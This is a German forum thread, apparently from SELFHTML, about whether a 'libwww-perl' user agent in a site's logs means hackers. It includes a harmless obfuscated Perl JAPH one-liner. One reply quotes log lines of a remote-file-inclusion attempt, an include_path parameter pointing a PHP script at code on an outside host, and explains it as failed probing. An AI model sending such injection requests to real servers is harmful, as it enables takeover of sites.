libwww-perl/5.805 = Hacker ?
0 0 0 
Patrick Andrieu
0 0 Patrick Andrieu
0 0 Patrick Andrieu
0 0 0 Patrick Andrieu
libwww-perl/5.805 = Hacker ?
Hallo
Habe in meinen Logfiles Besucherstatistik folgedes gefunden:
Da hat mein cgi einen Besucher mit
$ENV{'HTTP_USER_AGENT'}= libwww-perl/5.805 erkannt.
Ich habe mal gehört dass es Hacker sein können , die auf dem gesamten server zugreifen?
MFG
Ina
-
Da hat mein cgi einen Besucher mit
$ENV{'HTTP_USER_AGENT'}= libwww-perl/5.805 erkannt.Dabei handelt es sich um das libwww-Package, das zur Programmiersprache Perl gehört.
Ich habe mal gehört dass es Hacker sein können , die auf dem gesamten server zugreifen?
@P=split//,".URRUU\c8R";@d=split//,"\nrekcah xinU / lreP rehtona tsuJ";sub p{ @p{"r$p","u$p"}=(P,P);pipe"r$p","u$p";++$p;($q*=2)+=$f=!fork;map{$P=$P[$f^ord ($p{$_})&6];$p{$_}=/ ^$P/ix?$P:close$_}keys%p}p;p;p;p;p;map{$p{$_}=~/^[P.]/&& close$_}%p;wait until$?;map{/^r/&&<$_>}%p;$_=$d[$q];sleep rand(2)if/\S/;printSiechfred
--
Hinter den Kulissen passiert viel mehr, als man denkt, aber meistens nicht das, was man denkt.-
Hallo Siechfred
Vielen dank für Deine Antwort, abe ich habe nichts verstanden.
Sind dass nun kacker oder nicht?
mfg
Ina
-
Hallo Siechfred
Korektur hatte mich verschrieben:
Vielen dank für Deine Antwort, aber ich habe nichts verstanden.
Sind dass nun Hacker oder nicht?
mfg
Ina
-
Vielen dank für Deine Antwort, aber ich habe nichts verstanden.
Ist das auch wirklich kein Aprilscherz?
Sind dass nun Hacker oder nicht?
Nein, ganz bestimmt nicht :) Da hat einfach nur ein Perl-Programmierer vergessen, den UserAgent anzupassen oder ein Witzbold hat seinem Browser diesen UserAgent verpasst.
Siechfred
--
Hinter den Kulissen passiert viel mehr, als man denkt, aber meistens nicht das, was man denkt.
-
-
-
Hallo Siechfred!
@P=split//,".URRUU\c8R";@d=split//,"\nrekcah xinU / lreP rehtona tsuJ";sub p{
@p{"r$p","u$p"}=(P,P);pipe"r$p","u$p";++$p;($q*=2)+=$f=!fork;map{$P=$P[$f^ord
($p{$})&6];$p{$}=/ ^$P/ix?$P:close$}keys%p}p;p;p;p;p;map{$p{$}=~/[1]/&&
close$}%p;wait until$?;map{/^r/&&<$>}%p;$_=$d[$q];sleep rand(2)if/\S/;printWenn ich diesen Code ausführe, erhalte ich: 01.04.2008? ;) Auf der Konsole wird jedenfalls aborted... Viele Grüße aus Frankfurt/Main, Patrick --  \_ - jenseits vom delirium - \_ [[link:hatehtehpehdoppelpunktslashslashwehwehwehpunktatomicminuseggspunktcomslash](http://www.atomic-eggs.com/)] Nichts ist unmöglich? [Doch!](http://www.atomic-eggs.com/cwi/cwi_4.shtml) Heute schon ge[gök](http://goek.atomic-eggs.com/goek_goek.html)t?
P. ↩︎
-
gudn tach!
@P=split//,".URRUU\c8R";@d=split//,"\nrekcah xinU / lreP rehtona tsuJ";sub p{
@p{"r$p","u$p"}=(P,P);pipe"r$p","u$p";++$p;($q*=2)+=$f=!fork;map{$P=$P[$f^ord
($p{$})&6];$p{$}=/ ^$P/ix?$P:close$}keys%p}p;p;p;p;p;map{$p{$}=~/[1]/&&
close$}%p;wait until$?;map{/^r/&&<$>}%p;$_=$d[$q];sleep rand(2)if/\S/;print> > Wenn ich diesen Code ausführe, erhalte ich: 01.04.2008? ;) Auf der Konsole wird jedenfalls aborted... hab's nicht ausprobiert, aber es sieht stark nach japh aus. prost seth
P. ↩︎
-
Hallo seth_not@home!
Ich hab's (denke ich) korrekt enteinzeiler-isiert:
@P=split//,".URRUU\c8R"; @d=split//,"\nrekcah xinU / lreP rehtona tsuJ"; sub p{ @p{"r$p","u$p"}=(P,P); pipe"r$p","u$p"; ++$p; ($q*=2)+=$f=!fork; map{$P=$P[$f^ord ($p{$_})&6]; $p{$_}=/ ^$P/ix?$P:close$_}keys%p } p; p; p; p; p; map{$p{$_}=~/^[P.]/&&close$_}%p; wait until$?; map{/^r/&&<$_>}%p; $_=$d[$q]; sleep rand(2)if/\S/; printund erhalte kein 01.04.2008 :(
prost
Gök!
Viele Grüße aus Frankfurt/Main,
Patrick--
_ - jenseits vom delirium - _
[link:hatehtehpehdoppelpunktslashslashwehwehwehpunktatomicminuseggspunktcomslash]
Nichts ist unmöglich? Doch!
Heute schon gegökt?-
gudn tach!
ich hab's jetzt doch mal ausprobiert. und unter linux mit perl 5.8.8 funzt der kram im cli einwandfrei. mein aufruf war einfach:
perl -e '...'wobei die drei punkte die konkatenierten genannten zeilen symbolisieren sollen. hab keine ahnung, warum's bei dir nicht funzte. musst eigentlich bloss auf die einfachen anfuehrungszeichen achten (bei doppelten muesste der code abgeaendert werden).
goek!
-
Hallo seth_not@home!
perl -e '...'
musst eigentlich bloss auf die einfachen anfuehrungszeichen achten (bei doppelten muesste der code abgeaendert werden).Ja, bei Windows müssen nach perl -e ja doppelte Anführungszeichen stehen, aber auch nach Abändern der anderen in einfachen erhalte ich nichts...
Viele Grüße aus Frankfurt/Main,
Patrick--
_ - jenseits vom delirium - _
[link:hatehtehpehdoppelpunktslashslashwehwehwehpunktatomicminuseggspunktcomslash]
Nichts ist unmöglich? Doch!
Heute schon gegökt? -
Regök!
ich hab's jetzt doch mal ausprobiert. und unter linux mit perl 5.8.8 funzt der kram im cli einwandfrei. mein aufruf war einfach:
perl -e '...'mit PuTTy auf dem Server (Perl 5.8.8) eingeloggt und dann funzt's(TM) - schöner Code... ;)
Auf Windows und 5.8.7 (bei escaped Anführungszeichen) dagegen nicht (auch nicht 5.10.0 auf Vista)...
Viele Grüße aus Frankfurt/Main,
Patrick--
_ - jenseits vom delirium - _
[link:hatehtehpehdoppelpunktslashslashwehwehwehpunktatomicminuseggspunktcomslash]
Nichts ist unmöglich? Doch!
Heute schon gegökt?
-
-
-
-
hi Ina,
Habe in meinen Logfiles Besucherstatistik folgedes gefunden:
Da hat mein cgi einen Besucher mit
$ENV{'HTTP_USER_AGENT'}= libwww-perl/5.805 erkannt.
Ich habe mal gehört dass es Hacker sein können , die auf dem gesamten server zugreifen?Wie lautet deine Domain?
Grüße aus H im R an Ina,
Primus Enginus -
Hallo Ina!
Habe in meinen Logfiles Besucherstatistik folgedes gefunden:
Da hat mein cgi einen Besucher mit
$ENV{'HTTP_USER_AGENT'}= libwww-perl/5.805 erkannt.Falls es sich um solche Zeilen handelt:
85.14.216.89 - libwww-perl/5.76
Besuchte Domain Uhrzeit Methode Angeforderte Datei Status Referer
www.atomic-eggs.com 04:35:19 GET /cwi//auction/includes/messages.inc.php?include_path=http://www.manzoteam.it/millesimo/foto_week/36.txt???? 404 -
www.atomic-eggs.com 04:35:19 GET //auction/includes/messages.inc.php?include_path=http://www.manzoteam.it/millesimo/foto_week/36.txt???? 404 -hast Du es mit Script-Kiddies zu tun, die versuchen, die Datei (hier »36.txt«) über das eine oder andere unsichere PHP-Skript auf deinen Server einzuschleusen, um sie später sicher aufzurufen. Ist das PHP-Skript nicht da, haben die eh keine Chance, und erhalten einen 404.
Viele Grüße aus Frankfurt/Main,
Patrick--
_ - jenseits vom delirium - _
[link:hatehtehpehdoppelpunktslashslashwehwehwehpunktatomicminuseggspunktcomslash]
Nichts ist unmöglich? Doch!
Heute schon gegökt?-
Hallo Patrick
Also mein cgi hat den User im code $ENV{'HTTP_USER_AGENT'} als
libwww-perl/5.805 idedifiziert. Deine erwhnten Zeichen, standen nicht im
$ENV{'HTTP_USER_AGENT'}.dort steht normalerweise:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
und so was.
Vielen Dank
Ina
-
Hallo Ina!
Also mein cgi hat den User im code $ENV{'HTTP_USER_AGENT'} als
libwww-perl/5.805 idedifiziert. Deine erwhnten Zeichen, standen nicht im
$ENV{'HTTP_USER_AGENT'}.Du solltest auch in der Access-Log nachschauen, was der Besucher mit libwww als User Agent bei Dir gewollt hat! Dann findest Du eventuell solche Requests wie die beiden, die ich eben gepostet habe.
dort steht normalerweise:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)Oder »Bundestrojaner 1.3«, oder »Husseldiguggel« oder »Poisson d'avril 1.5«... ;)
Viele Grüße aus Frankfurt/Main,
Patrick--
_ - jenseits vom delirium - _
[link:hatehtehpehdoppelpunktslashslashwehwehwehpunktatomicminuseggspunktcomslash]
Nichts ist unmöglich? Doch!
Heute schon gegökt?-
Hallo Patrick
Also, ich weis dass der User auf einen Link zugegriffen hat.
Dieser Link verweist auf einen Ordner.In diesem Ordner liegt eine .htaccess Datei
mit dem Inhalt: DirectoryIndex index.shtmlDie index.html
leitet weiter zu:
<!--#include virtual="http://meinen-domain.de/cgi-bin/cgi.cgi?art=irgendwas&title=irgendwas" -->Wo finde ich die Access-Log?
mfg
Ina
-
leitet weiter zu:
<!--#include virtual="http://meinen-domain.de/cgi-bin/cgi.cgi?art=irgendwas&title=irgendwas" -->ein include ist keine weiterleitung
-
Hallo suit,
Vielen Dank, also ein Aufruf
mfg Ina
-
-
Hallo Ina!
<!--#include virtual="http://meinen-domain.de/cgi-bin/cgi.cgi?art=irgendwas&title=irgendwas" -->
Was ist/macht »cgi.cgi« für ein Skript? Hoffentlich ein sicheres (http://forum.de.selfhtml.org/archiv/2008/1/t164874/#m1074977)!
Wo finde ich die Access-Log?
Bei vielen Providern ist sie in einem Verzeichnis /logs, es kann aber auch sein, dass sie sonstwo versteckt ist, und - wie bei all inkl - Dir erst am nächsten Tag als .gz-Datei zur Verfügung steht. Frag einfach den Provider, jeder kocht da sein eigenes Süppchen...!
PS: nutze für Beispiele, oder wenn Du die eigene Domain nicht nennen willst: example.org/.com :
<!--#include virtual="http://example.org/cgi-bin/cgi.cgi?art=irgendwas&title=irgendwas" -->
Viele Grüße aus Frankfurt/Main,
Patrick--
_ - jenseits vom delirium - _
[link:hatehtehpehdoppelpunktslashslashwehwehwehpunktatomicminuseggspunktcomslash]
Nichts ist unmöglich? Doch!
Heute schon gegökt?
-
-
-
-
